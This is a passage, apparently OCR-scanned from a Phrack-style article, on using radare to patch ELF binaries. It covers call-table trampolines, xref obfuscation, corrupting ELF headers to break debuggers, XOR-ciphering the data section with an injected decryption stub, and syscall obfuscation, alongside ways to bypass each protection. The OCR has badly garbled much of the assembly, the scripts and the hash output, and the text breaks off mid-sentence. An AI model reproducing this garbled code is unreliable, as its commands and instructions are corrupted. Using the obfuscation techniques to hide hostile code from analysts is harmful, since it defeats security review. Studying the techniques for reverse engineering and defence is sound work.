create an eNumerate flag at every offset specified in ’xrefs’ file 
fN calladdr @@.xrefs 


—- Create a proxy hook to bridge execution without destroying the stack. 


This is explained in the following lines. 


—- Change the call of the hook to our proxy function 


write assembly code ’call <addr>’ 

t+ quotes will replace the inner string with the result of the 
command ?v which prints the hexadecimal value of the given expr. 
wa call ‘?v dstaddr * 


— PrOfLTt 


Here is an example assembly code that demonstrates the functionality of the 
trampoline for the patched call. This snippet of code can be injected after 
the mmap trampoline. 


8< 
-global main 


trampoline: 
push Shookstr 
call puts 
add $4, %esp 
jmp puts 


main: 
push Shello 
call trampoline 
add $4, %esp 
ret 


.data 


hello: 
-string "hello world" 
hookstr: 
.string "hook!" 
8< 
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The previous code cannot be injected directly in the binary, and one of the 
main conceptual reasons is that the destination address of the trampoline 
will be defined at runtime, when the mmapped region of the data section is 
ready with executable permissions, the destination address must be stored 
somewhere in the data section. 


--[ 2.4.1 - Call trampoline 


Once the holes have been identified we can now modify some parts of the 
program to obfuscate the control flow, symbol access, function calls and 
inlined syscalls in different ways. 


To walk through the program code blocks we can use iterators or nested 
iterators to run from simple to complex scripted code analysis engines and 
retrieve or manipulate the program by changing instructions or moving code. 


The control flow of the program can be obfuscated by adding a calltable 
trampoline for calling functions. We will have to patch the calls and store 
the jump addresses in a table in the data section. 


The same hack can be done for long jumps by placing a different trampoline 
to drop the stacked eip and use jumps instead of calls. 


Iterators in radare can be implemented as macros appending the macro call 
after the @@ foreach mark. 


For example: "x @ 0x200" 


will temporally seek to 0x200 and run the "x" command. 
Using: "x @@ .(iterate-functions)" 
will run the iterator macro at every address returned by the macro. 


To return values from a macro we can use the null macro body and append the 
resulting offset. If no value is given, null is returned and the iterator 
will stop. 


Heres the implementation for the function-iterator: 


"(iterate-functions, ()CF~#$@,)" 


We can also use the search engine with cmd.hit eval variable to run a 
command when a search hit is found. Obviously, the command can be a macro 
or a script file in any language. 


e cmd.hit=ar- $$ $$+5 
/X XX yy ZZ 


But we can also do it after processing the search by just removing the 
false positive hits and running a foreach command. 


configure and perform search 
e search.from=section._text 

e search.to=section._text_end 
e cmd.search= 

/X XX yy ZZ 


filtering hit results 


fs search ; enter into the search flagspace 
f ; list flags in search space 
fF -hit0_3 ; remove hit #3 


write on every filtered hit 
wx 909090 @@ hit* 


Flagspaces are groups of flags. Some of them are automatically created by 
rabin while identifying strings, symbols, sections, etc, and others are 
updated at runtime like by commands like ‘’regs’ (registers) or ’search’ 
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(search results). 


You can switch to or create another flagspace using the ’fs’ command. When 
a flagspace is selected the ’f’ command will only show the flags in the 
current flagspace. ’fs *’ is used to enable all flagspaces at the same time 
(global view). See fs? for extended help. 


The internal metadata database can be managed with the C command and stores 
information about code and data xrefs, comments, function definitions, 
type, data conversions and structure definitions to be used by the 
disassembler engine, the code analysis module and user defined scripts. 


Data and code xrefs are very useful reference points while reverse 
engineering. It is interesting to obfuscate them all as much as possible 
to fool code analysis engines, forcing the reverser to use runtime or 
emulated environments to determine when a string or a buffer is used. 


To analyze a function in radare is preferably to go into Visual mode with 
command ’V’, and then press the keys "d" and "f". 


This action will make a code analysis from the current seek or where the 
cursor points (if in cursor mode, toggleable with the lowercase "c" key in 
Visual mode). This code analysis will define multiple things like argument, 
local and global variabl accesses, feeding the database with xref 
information that can be later used to determine which points of the program 
are using a certain pointer. 


By defining few eval vars in your ~/.radarerc most of this basic code 
analysis will be done by default. 


S$ cat ~/.radarerc 
file.id=tru ; identify file type and set arch/baddr... 
e file.analyze=true ; perform basic code analysis at startup 
file.flag=tru ; add basic flags 
e scr.color=true ; use color screen 


NOTE: By passing the ’-n’ parameter to radare the startup process will skip 
the interpretation of .radarerc. 


All this information can be cached, manipulated and restored using project 
files (with the -P program flag at startup or enabling this feature in 
runtime with the ’P’ command). 


After this parenthesis we continue obfuscating the xrefs to make reversers 
life funnier. 


One simple way to do this would be to create an initialization code, 
copying some pointers required by the program to run at random mmaped 
addresses and defining a way to transform these accesses into a sequence 
jigsaw. This can be achieved turning each pointer "random" based on some 
rules like a shifted array accessed by a mod. 


calltable initializer 

(ct-init tramp ctable ctable_end 
f trampoline @ SO 

f calltable @ $1 

f calltable_ptr @ calltable 

wf trampoline.bin @ trampoline 
b $2-S1 
wb 00 ; fill calltable with nops 
) 


; calltable adder 
(ct-add 
; check if addr is a long call 
? [1:$$]==Oxeb 
2!) 
; check if already patched 
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? [4:$$+1]==trampoline 
#2) 
wv $S+5 @ calltable_ptr 

yt 4 calltable_ptr+4 @ $S+1 
f calltable_ptr @ calltable_ptrt+8 
wv trampoline @ $$+1 


) 


We can either create a third helper macro that automatically iterates over 
every long call instruction in .text and running ct-add on it. 


(ct-run from to tramp ctable ctable_end 
.(ct-init tramp ctable ctable_end) 
s from 
loop: 
? [1:$$]==O0xeb 
22 . (ct-add) 
s +$$$ 
? $$ < to 
2??.loop: 


) 


Or we can also write a more fine-grained macro to walk over the function 


e asm.profile=simple 
pD~call[0] > jmps 

-(ct-init 0x8048000 0x8048200) 
. (ct-add) @@.jmps 


The trampoline.bin file will be something like this: 


* Calltable trampolin xample // pancake 


S$ gcc calltrampoline.S -DCTT=0x8048000 -DCTT_SZ 100 
*/ 


ifndef CTT_SZ 
define CTT_SZ 100 
endif 
ifndef C 
define CTT call_trampoline_table 
endif 


-text 
-global call_trampoline 
-global main 


main: 
[eS 
call ct_init 
call ct_test 
smi A 
pushl Shello 
call puts 
add $4, %esp 
ret 


call_trampoline: 


pop Sesi 

leal CTT, %tedi 

movl %esi, 0(%edi) /* store ret addr in ctable[0] */ 
0: 

add $8, %edi 

empl O(%edi), %esi /* check ret addr against ctable*/ 
jnz Ob 

movl 4(%edi), %edi /* get real pointer */ 
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call *%edi /* call real pointer */ 
jmp *CTT /* back to caller */ 


/* initialize calltable */ 
ron einen Eo i war 
leal CTT+8, %tedi 

movl Sretaddr, 0(%edi) 
movl Sputs, 4(%edi) 
ret 


/* hello world using the calltable */ 
CE2teset:: 

push Shello 

call call_trampoline 


retaddr: 

add $4, %esp 
ret 

.data 

hello: 


.string "Hello World" 


call_trampoline_table: 
wht ll 8 (CET-SZHL);,.  d:,<0%00 


Note that this trampoline implementation is not thread safe. If two threads 
are use the same trampoline call table at the same time to temporally store 
the return address, the application will crash. 


To fix this issue you should use the %Sgs segment explained in the ’syscall 
obfuscation’ chapter. But to avoid complexity no thread support will be 
added at this moment. 


To inject the shellcode into the binary we will have to make some space in 
the .data segment for the calltable. We can do this with gcc -D: 


[O0x8048400]> !!gcec calltrampoline.S -DCTT=0x8048000 -DCTT_SZ=100 
> !! rabin -o d/s a.out|grep call_trampoline|cut -d : -f 2 > tramp.hex 
> wF tramp.hex @ trampoline_addr 


--[ 2.4.2 - Extending trampolines 


We can take some real code from the target program and move it into the 
.data section encrypted with a random key. Then we can extend the call 
trampoline to run an initialization function before running the function. 


Our call trampoline extension will cover three points: 


— Function prelude obfuscation - Function mmaping (loading code from data) 
- Unciphering and checksumming 


At the same time we can re-encrypt the function again after calling the end 
point address. This will be good for our protector because the reverser 
will be forced to manually step into the code because no software 
breakpoints will be able to be used on this code because they will be 
re-encrypted and the checksumming will fail. 


o do this we need to extend our call trampoline table or just add another 
field in the call trampoline table specifying the status of the destination 
code (if it is encrypted or not) and optionally the checksum. 


The article aims to explain guidelines and possibilities when playing with 
binaries. But we are not going to implement such kind of extensions to 
avoid enlarge too much this article explaining these advanced techniques. 


The ’p’ command is used to print the bytes in multiple formats, the more 
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powerful print format is ’pm’ which permits to describe memory contents 
using a format-string like string and name each of the fields. 


When the format-string starts with a numeric value it is handled as an 
array of structures. The ’am’ command manages a list of named ’pm’ commands 
to ease the re-use of structure signatures along the execution of radare. 


We will start introducing this command describing the format of an entry of 
our trampoline call table: 


[OxO08049AD0]> pm XX 
0x0000lad0 = 0x895eed31 
Ox0000lad4 = Oxf0e483el 


Now adding the name of fields: 


[Ox08049AD0]> pm XX from to 
from : 0x00001lad0 = 0x895eed31 
to : 0x0000lad4 = Oxf0e483el 


And now printing a readable array of structures: 


[Ox08049AD0]> pm 3XX from to 
0x00001lad0 [0] { 
From : 0x0000lad0 = 0x895eed31 
to : 0x0000lad4 = Oxf0e483el 
} 
0x0000lad8 [1] { 
from : 0x0000lad8 = 0x68525450 
to : O0x0000ladc = 0x0805b6a0 
} 
0x0000lae0 [2] { 
From : 0x0000lae0 = 0x05b6b068 
to : 0x0000lae4 = 0x68565108 


} 


There is another command named ’ad’ that stands for /’/analyze data’. It 
automatically analyzes the contents of the memory (starting from the 
current seek) looking for recognized pointers (following the configured 
endianness), strings, pointers to strings, and more. 

The easiest way to see how this command works is by starting a program in 
debugger mode (f.ex: radare -d ls) and running ’ad@esp’. 


The command will walk through the stack contents identifying pointers to 
environment variables, function pointers, etc.. 


Internal grep ’~’ syntax sugar can be used to retrieve specific fields of 
structures for scripting, displaying or analysis. 


register a ’pm’ in the ’am’ command 
0x08048000]> am foo 3XX from to 


grep for the rows matching ’from’ 
0x08048000]> am foo” from 
from : 0x00001lad0 = 0x895eed31 
from : 0x0000lad8 = 0x68525450 
from : 0x0000lae0 0x05b6b068 


# grep for the 4th column 
[0x08048000]> am foo~ from[4] 
0x895eed31 

0x68525450 

0x05b6b068 


# grep for the first row 
[0x08048000]> am foo~ from[4] #0 
0x895eed31 
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[3 Protections and manipulations 


This chapter will face different manipulations that can be done on binaries 
to add some layers of protections to make revers ngineering on the target 
binaries a more complicated. 


--[ 3.1 - Trashing the ELF header 


Ea 


Corrupting the ELF header is another possible target of a packer for making 
the reverser’s life little harder. 


Just modifying one byte in the ELF header becomes a problem for tools like 
gdb, ltrace, objdump, ... The reason is that they depend on section headers 
to get information about sections, symbols, library dependencies, etc... 
and if they are not able to parse them they just stop with an error. At the 
moment of writing, only IDA and radare are able to bypass this issue. 


This can be easily done in this way: 
S$ echo wx 99 @ 0x21 | radare -nw a.out 


A reverser can use the fix-shoff.rs (included in the scripts) directory in 
the radare sources, to reconstruct the ’e_sh_off’ dword in the ELF header. 


S cat scripts/fix-shoff.rs 
; vadare script to fix elf.shoff 


(fix-shoff 

s 0 ; seek to offset 0 

s/ .text ; seek to first occurrence of ".text" string 
loop: 

s/x 00 ; go next word in array of strings 

2? [1:$$+1] ; check if this is the last one 

?!.loop: ; loop if buf[1] is == 

s +4-SS%4 ; align seek pointer to 4 

£ nsht ; store current seek as ‘’nsht’ 


wv nsht @ 0x20 ; write the new section header table at 0x20 (elf.sh_off) 
) 


The script is used in this way: 
S echo ".(fix-shoff) && g" | radare -i scripts/fix-shoff.rs -nw "target-elf" 


[This script works on any generic bin with a trashed shoff. It will not work 
on binaries with stripped section headers (after ’sstrip’ f.ex.) 


This is possible because GCC stores the section header table immediately 
after the string table index, and this section is easily identified becaus 
the .text section name will appear on any standard binary file. 


It is not hard to think on different ways to bypass this patch. By just 
stripping all the rest of section after setting shoff to 0 will work pretty 
well and the reverser will have to regenerate the section headers 
completely. This can be done by using sstrip(1l) (double ’s’ is not a typo) 
from the elf-kickers package. This way we eliminate all unnecessary 
sections to run the program. 


The nice thing of this header bug is that the e_shoff value is directly 
passed to lseek(2) as second argument, and we can either try with values 
like 0 or -1 to get different errors instead of just giving an invalid 
address. This way it is possible to bypass wrong ELF parsers in other ways. 


Similar bugs are found in MACH-O parsers from GNU software like setting 
number of sections to -1 in the SEGMENT_COMMAND header. These kind of bugs 
don’t hit kernels because they usually use minimum input from the program 
headers to map it in memory, and the dynamic linker at user space do the 
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rest. But debuggers and file analyzers usually fail when try to extract 
corrupted information from headers. 


--[ 3.2 - Source level watermarks 


If we have the source of the target application there will be more ways to 
play with it. For instance, using defines as volatile asm inline macros, 
the developer can add marks or paddings usable for the binary packer. 


Some commercial packers offer an SDK which is nothing more than a set of 
include files offering helper functions and watermarks to make the packers 
life easier. And giving to the developer more tools to protect their code. 


S$ cat watermark.h 
#define WATERMARK __asm__ __volatile__ (".byte 3,1,3,3,7,3,1,3,3,7"); 


We will use this CPP macro to watermark the generated binary for later 
post-processing with radare. We can specify multiple different watermarks 
for various purposes. We must be sure that these watermarks are not already 
in the generated binary. 


We can even have larger watermarks to pad our program with noisy bytes in 
the .text section, so we can later replace these watermarks with our 
assembly snippets. 


Radare can ease the manual process of finding the watermarks and injecting 
code, by using the following command. It will generate a file named 
‘water.list’ containing one offset per lin 


[0x00000000]> /x 03010303070301030307 
[Ox00000000]> f hit [0] > water.list 
[OxO00000000]> !!cat water.list 

0x102 

Oxl13c 

Oxla2 

0x219 


If we want to run a command at every offset specified in the file: 
[0x00000000]> .(fill-water-marks) @@. water.list 
Inside every fill-water-mark macro we can analyze the watermark type 


depending on the ’hit’ flag number (we can search more than one keyword at 
a time) or by checking the bytes there and perform the proper action. 


If those watermarks have a fixed size (or the size is embedded into the 
watermark) we can then write a radare script that write a branch 
instruction at to skip the padding. (This will avoid program crash because 
it will not execute the dummy bytes of our watermark). 


Here’s an ascii-art explanation: 


<-- watermark > 
|< unused bytes ==> 


FMP S:StSasZS Ss" | hee ke asp P Ace) ee Se Se” Sel AD fede “EE eke, program 


| A 


‘N , 


At this point we have some more controlled holes to put our code. 


Our variable-sized watermark will be defined in this way: 
-long 0,1,2,3,4,5,6,7,4*20,9,10,11,12,13,14,15,16,17,18,19,20 


And the watermark filling macro: 
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(fill-water-marks,wa jmp S$${io.vaddr}+$$+[$$+8],) 


# run the macro to patch the watermarks with jumps 
.(fill-water-marks) @@. water.list 


The io.vaddr specified the virtual base address of the program in memory. 


--[ 3.3 - Ciphering .data section 


A really common protection in binaries consists on ciphering the data 
section of a program to hide the strings and make the static code analysis 
harder. 


The technique presented here aims to protect the data section. This section 
generally does not contain program strings (because they are usually 
Ss 
c 
Ss 


tatically defined in the rodata section), but will help to understand some 
haracteristics of the ELF loader and how programs work with the rw 
ections. 


The PT_LOAD program header type specifies where, which and how part of the 
binary should be mapped in memory. By default, the kernel maps the program 
at a base address. More over it will map aligned size (asize) of the 
program starting at /’/physical’ on ’/’virtual’ address with ’flags’ 
permissions. 


$ rabin -I /bin/ls | grep baddr 
baddr=0x08048000 


S$ rabin -H /bin/ls | grep LOAD 
virtual=0x08060000 physical=0x00018000 asize=0x1000 size=0x0fe0 \ 
flags=0x06 type=LOAD name=phdr_0 


In this case, 4K is the aligned size of Oxfe0 bytes of the binary will be 
loaded at address 0x8060000 starting at address 0x18000 of the file. 


By running ’.!rabin -rIH SFILE’ from radare all this information will be 
imported into radare and it will emulate such situation. 


The problem we face here, is that the size and address of the mapped area 
doesn’t match with the offset of the .data section. 


Some operations are required to get the correct offsets to statically 
modify the program to cipher such range of bytes and inject a snippet 
of assembly to dynamically decipher such bytes. 


The script looks like: 


8< 
flag from virtual address (the base address where the binary is mapped) 
this will make all new flags be created at current seek + <addr> 
we need to do this because we are calculating virtual addresses. 
Ff SS{io.vaddr} 


Display the ranges of the .data section 
?e Data section ranges : ‘?v section._data‘- ‘?v section._data_end* 


set flag space to ’segments’. This way ’f’ command will only display the 
flags contained in this namespace. 
fs segments 


Create flags for ’virtual from’ and /virtual to’ addresses. 

We grep for the first row ’#0’ and the first word ’[0]’ to retrieve 
the offset where the PT_LOAD segment is loaded in memory 

f vfrom @ ‘f° vaddr[0] #0°* 


‘virtual to’ flag points to vfrom+ptload segment size 


1 


Fh Fh 


? 


Fh Fh FH it 


2 


? 


W 


2 
) 
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fF vto @ vfrom+*‘f~vaddr[1]#0* 


Display this information 
e Range of data decipher : ‘?v vfrom‘—- ‘?v vto*= ‘?v vto-vfrom‘bytes 


Create two flags to store the position of the physical address of the 
PT_LOAD segment. 

pfrom @ ‘f~paddr[0] #0 * 

pto @ pfrom+*f~paddr[1]#0* 


Adjust deltas against data section 


+t pdelta flag is not an address, we set flag from to 0 


pdelta = (address of .data section)-(physical address of PTLOAD segment) 
f 0 && £ pdelta @ section._data-pfrom 
e Delta is ‘?v pdelta* 


reset flag from again, we are calculating virtual and physical addresses 
f SS{io.vaddr} 

pfrom @ pfromt+pdelta 

vfrom @ vfrom+pdelta 

£0 


e Range of data to cipher: ‘?v pfrom‘- ‘?v pto*‘= ‘?v pto-pfrom*‘bytes 


Calculate the new physical size of bytes to be ciphered. 
we dont want to overwrite bytes not related to the data section 


f psize @ section._data_end - section._data 


e PSIZE = ‘?v psize* 


‘'wox’ stands for ’write operation xor’ which accepts an hexpair list as 
a cyclic XOR key to be applied to at '’pfrom’ for ‘'psize’ bytes. 


ox a8 @ pfrom:psize 


Inject shellcode 


Setup the simple profile for the disassembler to simplify the parsing 
of the code with the internal grep 
asm.profile=simple 


Seek at entrypoint 
entrypoint 


Seek at address (fourth word ’[3]’) at line’#1’ line of the disassembly 
matching the string /’push dword’ which stands for the ’__libc_csu_init’ 
symbol. This is the constructor of the program, and we can modify it 
without many consequences for the target program (it is not widely used). 
‘od 207° push dword[3]#1°* 


Compile the ’uxor.S’ specifying the virtual from and virtual to addresses 


'gcc uxor.S -DFROM=‘*?v vfrom* —DTO=*‘?v vfromtpsize * 


Extract the symbol ’/main’ of the previously compiled program and write it 
in current seek (libc_csu_init) 


wx ‘!!rabin -o d/s a.out|grep *main|cut -d ’ ’ -f 2° 


Cleanup! 
e Uncipher code: ‘?v $$+SS{io.vaddr} * 
'rm -f a.out 


q! 


T 


8< 


he unciphering snippet of code looks like: 


8< 
global main 


main: 
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mov SFROM, %esi 
mov $TO, %edi 
0: 
inc %Sesi 
xorb $Oxa8, 0(%esi) 
cmp %edi, %esi 
jbe Ob 
xor %edi, %edi 
ret 
8< 


Finally we run the code: 


$ cat hello.c 
#include <stdio.h> 
char message[128] = "Hello World"; 


int main() 
{ 
message[l]=’a’; 
if (message[0]!='H’) 
printf ("Oops\n") ; 
else 
printf("%Ss\n", message) ; 
return 0; 


} 


$ gcc hello.c -o hello 

S$ strings hello | grep Hello 
Hello World 

S ./hello 
Hallo World 

S$ radare -w -i xordata.rs hello 
S$ strings hello | grep Hello 

S ./hello 

Hallo World 


The ’Hello World’ string is no longer in plain text. 


27 


The ciphering 


algorithm is really stupid. The reconstructed data section can be 


extracted from a running process using the debugger: 


S$ cat unpack-xordata.rs 

e asm.profile=simple 

s entrypoint 

‘cont ‘pd 20°push dword[3] #2 °* 


f delta @ section._data- segment.phdr_0.rw_.paddr-section. 


s segment.phdr_0O.rw_.vaddr+delta 


b section._data_end - section._data 


wt dump 
q! 


S radare -i unpack-xordata.rs -d ./hello 


S$ strings dump 
Hello World 


Or statically: 


e asm.profile=simple 
wa ret @ ‘pd 20°push dword[3] #1 °* 


wox a8 @ section._data:section._data_end-section.data 


This is a plain example of how complicated can be to add a protection and 


how easy is to bypass it. 


As a final touch for the unpacker, just write a ‘ret’ 


’libc_csu_init’ where the deciphering loop lives: 


wa ret @ sym.__libc_csu_init 


instruction at symbol 
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Or just push a null pointer instead of the csu_init pointer in the entrypoint. 


e asm.profile=simple 
s entrypoint 
wa push 0 @ ‘pd 20°push dword[0]#1°* 


--[ 3.4 - Finding differences in binaries 
Lets draw a scenario where a modified binary (detected by a checksum file 


analyzer) has been found on a server, and the administrator or the forensic 
analyst wants to understand whats going on that file. 


To simplify the explanation the explanation will be based on the previous 
chapter example. 


At first point, checksum analysis will determine if there’s any collision 
in the checksum algorithm, and if the files are really different: 


S$ rahash -a all hello 
par: 0 

XOLr: 00 

hamdist: O01 

xorpair: 2121 
entropy: 4.46 

mod255: 84 


erclé: 2654 

Gre32Zs a8a3f£265 

md4: chf£c07c65d377596dd27e64e0dcac6cd 

md5: 2b3b691d92e34ad04blaffea0ad2e5ab 

shal: 8ac3£9165456e3ac1219745031426£54c6997781 


sha256: 749e6alb06d0cf56f178181c608fcb6bbd7452e361lble8bfbcfac1310662d4775 
sha384: c00abb14d483d25d552c3f881334ba60d77559ef2cbh01f£0739121a178b05... 
sha512: 099b42a52b106efea0dc73791a12209854bc02474d312e6d3c3ebf2c272ac... 


S$ rahash -a all hello.orig 
par: 0 

XOL: de 

hamdist: 01 

xorpair: a876 

entropy: 4.29 

mod255: 7b 


Creoles 2f1f 

erd32: b8£63e24 

md4: bc9907d433d9b6de7cb66730a09eed6f4 

md5: 6085b754b02ec0fc371la0bb7f3d2f34e 

shal: 6b0d034489ch5ad9F3443aadfaf7d8afcab6d3eb101 


sha256: 8d58d685cf3c2f55030e06e3a006b011C7177869058aldcd063ad1e0312faldel 
sha384: 6e23826cclee9f2a3e5f650dde52c5da44dc395268152fd5c98694ec9afal... 
sha512: 09b7394cle03decde83327fdfd678de97696901eE6880eE779cC640acb6b4f3bf... 


There is the possibility to generate two different files matching until 3 
different checksum algorithms (and maybe more in the future). If any of 
them differs we can determine that the file is different. 


$ du -bs hello hello.orig 
4913 hello 
4913 hello.orig 


As both files have the same size it will be worth using a byte-level 
diffing, because it is more probable easy to read the differences than 
trying to understand them as deltified ones (which is the default diffing 
algorithm). 


S$ radiff -b hello.orig hello 


000003ed 00 
000003f0 55 | 60 
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O000003f1 89 be 
000003f2 e5 c0 
00000406 fe 61 
00000407 ff c3 
00000408 ff 90 
00000409 8d 90 
0000040a bb 90 
0000040b 18 90 
0000040c ff 
000005bd 00 
000005c0 00 a8 
000005c1 00 a8 
000005c2 00 a8 
O000005d£f 00 a8 
000005e0 48 e0 
000005e1 65 cd 
000005e2 6c c4 
000005e3 6c c4 
000005e4 6f on) 
O000065£ 00 a8 
00000660 00 


, , 


Radiff detects two blocks of changes determined by th lines. 


The first block starts at 0x3f0 and the second one 
at address 0x5c0. 


(which is bigger) begins 


While watching the massive 00->a8 conversion it is possible to blindly 
determine that the ciphering algorithm is XOR and the key is Oxa8. But 
let’s get a look on the first block of changes and disassemble the cod 


S BYTES=S(radiff -f O0x3f0 -t 0x40b -b hello.orig hello | 
S$ rasm -d "S(echo ${BYTES})" 
pushad 


awk ’{print $4}’) 


mov esi, 
mov edi, 
inc esi 
xor byte 
cmp esi, 


0x80495c0 
0x8049660 
[esi], Oxa8 
edi 


jbe 0x38 
popad 
ret 


Here it is! this code of assembler is looping from 0x80495c0 to 0x8049660 
and XORing each byte with Oxas. 


radiff can also dump the results of the diff in radare commands. The 
execution of the script will result on a binary patch script to convert one 
file to another. 


S$ radiff -rb hello hello.orig > binpatch.rs 
S$ cat binpatch.rs | radare -w hello 
S§ md5sum hello hello.orig 


6085b754b02ec0fc37la0bb7£3d2f34e hello 
6085b754b02ec0fc37la0bb7£3d2f34e hello.orig 
--[ 3.5 - Removing library dependencies 
In some gnu/linux distributions, all the ELF binaries are linked against 
libselinux, which is an undesired dependency if we want to make our hello 
world portable. SElinux is not available in all gnu/linux distros. 
This is a simple example, but we can extend the issue to bad pkg-config 
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configuration files that can make a binary depend on more libraries than 
the minimum required. 


Perhaps most users will not care and will probably install those 
dependencies, recompile the kernel or whatever else. It is a pity to make 
steps in backward instead of telling gcc to not link against those 
libraries. 


But we can avoid these dependencies easily: all the library names are 
stored as zero-terminated strings in the ELF header, and the loader (at 
least the Solaris, Linux and BSD ones) will ignore dependency entries if 
the library name is zero length. 


The patch consists on finding the non-desired library name (or the prefix, 
if there are more than one libraries with similar names) and then write 
0x00 in each search result. 


S$ radare -nw hello 
[0x00000000]> / libselinux 
. (results) 
[0Ox00000000]> wx 00 @@ hit 
[0x00000000]> q! 


Using -nw radare will run without interpreting the ~/.radarerce and it will 
not detect symbols or analyze code (we only need to use the basic 
hexadecimal capabilities). The -w flag will open the file in read-writ 


Each search result will be stored in the ’search’ flagspace with names 
predefined by the ’search.flagname’ eval variable that will be hit%d_%d by 
default. (This is keyword_index and hit_index). 


The last command will run ’wx 00’ at every ’@@’ flag matching ’hit’ in the 
current flagspace. 


Use ’q!’ if you don’t want to be prompted to restore the changes done 
before exiting. 


--[ 3.6 - Syscall obfuscation 
Looking for raw int 0x80 instructions on standard binaries it’s going 


probably to be a hard task unless these are statically compiled. This is 
because they usually live in libraries which are embedded in the program. 


Libraries like libc have loads of symbols that are directly mapped to 
syscalls, and the reverser could use this information to identify code in a 
statically compiled program. 


To obfuscate symbols we can embed syscalls directly on the host program, 
after trashing the stack to break standard backtraces. 


If you go deep enough on the new syscalling system of Linux you will notice 
that the int 0x80 syscall mechanism is no longer used in the current x86 
platforms because performance reasons. 


The new syscall mechanism consists in calling a trampoline function 

installed by the kernel as a ’fake’ ELF shared object mapped on the running 
process memory. This trampoline function implements the most suitable 
: : 
V 


yscall mechanism for the current platform. This shared object is called 
DSO. 


In Linux only two segment registers are used: cs and gs. This is for 
Simplicity reasons. The first one allows to access to the whole program 
memory maps, and the second one is used to store Thread related 
information. 


Here is a simple segment dumper to get the contents from %gs. 
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S$ cat segdump.s 


define FROM 0 /* 0x8048000 */ 
define LEN 0x940 

define TIMES 1 

define SEGMENT %gs /* %ds */ 


-global main 


.data 
buffer: 
.fill LEN, TIM 


GI 


S, 0x00 


-text 
main: 


mov STIMES, %ecx 
loopme: 
push %ecx 


sub STIMES, %ecx 
movl SLEN, %eax 
imul %eax, %ecx 
movl %ecx, %esi /* esi = (STIMES-%ecx) *SLEN */ 
addl SFROM, %esi 
lea buffer, %edi 
movl SLEN, %ecx 


rep movsb SEGMENT: (%esi),%es: (Sedi) 


movl $4, %eax 
movl $1, %ebx 
lea buffer, %Secx 
movl SLEN, %edx 
int $0x80 


pop %Secx 

xOor %eax, %eax 
cmp %e€ax, %eECxX 
dec %ecx 

jnz loopme 


ret 


8< 


At this point we disable the random va space to analyze the contents of the 
VDSO map always at the same address during executions. 


S sudo sysctl -w kernel.randomize_va_space=0 
Compile and dump the segment to a file: 


S$ gcc segdump.sS 
S$ ./a.out > gs.segment 


And now let’s do some little analysis in the debugger: 
S$ radare -d ls ; debug ’ls’ program 


; Inside the debugger we write the contents of the gs.segment file. 
; In the initial state, the current seek points to ’eip’. 


[Ox4A13B8C0O]> wf gs.segment 
Poke 100 bytes from gs.segment 1 times? (y/N) y 


file poked. 

offset 01 23 45 67 89 AB CD EF 012345678 9ABCDEF 
Ox4al3b8c0, c006 e8b7 580b e8b7 c006 e8b7 0000 0000 ....X........... 
Ox4al3b8d0, 1414 feb7 ec06 0a93 b305 6bheb 0000 0000 .......... Kis. ee te's 


Ox4al3b8e0, 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
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Ox4al3b8f£0, 
0x4a13b900, 
0x4a13b910, 


; Once the file is poked in process memory w 
; analyze the contents of the current data block. One possibl 


; is to use the command which prints memory contents fol 
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0000 0000 0000 0000 0000 0000 0000 0000 
0000 0000 0000 0000 0000 0000 0000 0000 
0000 0000 0000 0000 0000 0000 0000 0000 


‘pm’ 


; format string we use as argument, 
; element names as in a structure. 


; Another option is the ’ad’ 
; memory as 32bit primitives following pointers and identifying 


sre 


ferences to code, 


data, 


[Ox4A13B8C0O]> pm XXXXXXXXX 


0x4al3b8c0 
O0x4al3b8c4 
0x4al3b8c8 
Ox4al3b8cc 
0x4al3b8d0 
Ox4al3b8d4 
0x4al3b8d8 
Ox4al3b8dc 
0x4al3b8e0 


Oxb7fe46c0 
Oxb7fe4ac8 
Oxb7fe46c0 
0x00000000 
Oxb7f££400 
Oxff0a0000 
0x856003b1 
0x00000000 
0x00000000 


[Ox4A13B8CO]> ad 


Ox4al3b8c0, int be=0xc0 
Ox4al3b8c4, int be=0xc8 
Ox4al3b8c8, int be=0xc0 
Ox4al3b8cc, (NULL) 
O0x4al3b8d0, int be=0x00 
Oxb7f£f£f£400, string " 
Oxb7ff£f£404, int be=0xed5d 
; Both analysis 
; Disassembling 
; the code uses sysent 
[Ox4A13B8CO]> pd 17 @ 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
--> _vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
‘=< _vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
_vdso__0:0xb7ff 
After this 
transform the "int 0x80" 
new_syscall: 
push %Sedi 
push %Sesi 
movl S$0x10, %esi 
movl %gs:(%esi), %Sedi 
call *%edi 
pop %Sesi 
pop %Sedi 


; eax 


command which ‘analyzes data’ 


32 


hav 


different 


ways to 
e option 
lowing the 


it is also possible to specify the 


; maps._vdso__0+0x400 


; eax 
; eax 


re 


strings or null pointers. 


ading the 


46feb7 le=0xb7fe46c0 

4afeb7 le=0xb7fe4ac8 

46feb7 le=0xb7fe46c0 

f4ffb7 le=Oxb7fff400 maps._vdso__0+0x400 
QRU " 

0f3490 le=0x90340fe5 


r. 


f 
Rca Re aR a eS 
CDOCOCOX 
OWNrR OF 

ee 


Nous 

OOOO 

M9 oO ON~ 
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NN 


pS Ww 

ooo) 

aaa 
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jo) 
(0) 
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N 


NN 


Fy FH FH FH FH FEF) Fh FH FS FR EFM FR FHS FO FF 
N 


S 
PRR 
WNEO 


51 
52 
tS) 
89e5 
0f34 
90 
90 
90 
90 
90 
90 
90 
ebf3 
5d 
5a 
59 
c3 


(print disassembly) 


push ecx 
push edx 
push ebp 

mov ebp, esp 
sysenter 

nop 

nop 

nop 

nop 

nop 

nop 

nop 

jmp Oxb7f£ff403 
pop ebp 

pop edx 

pop ecx 

ret 


result in a pointer to the vdso map at 0x4al3b8d0 
these contents with ‘pd’ 


we get that 


little analysis we can use a new way to call syscalls and 


instructions into a bunch of operations. 
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ret 


Using this ‘big’ primitive we are able to add more trash code and make 
static analysis harder. 


Using dynamic analysis it is possible to bypass this protection by writing 
a simple script that dumps the backtrace every time a syscall is executed. 


(syscall-bt 
e scr.tee=log.txt 
label: 
'contsc 
bt 
-label: 
) 


Or with a shell single liner: 


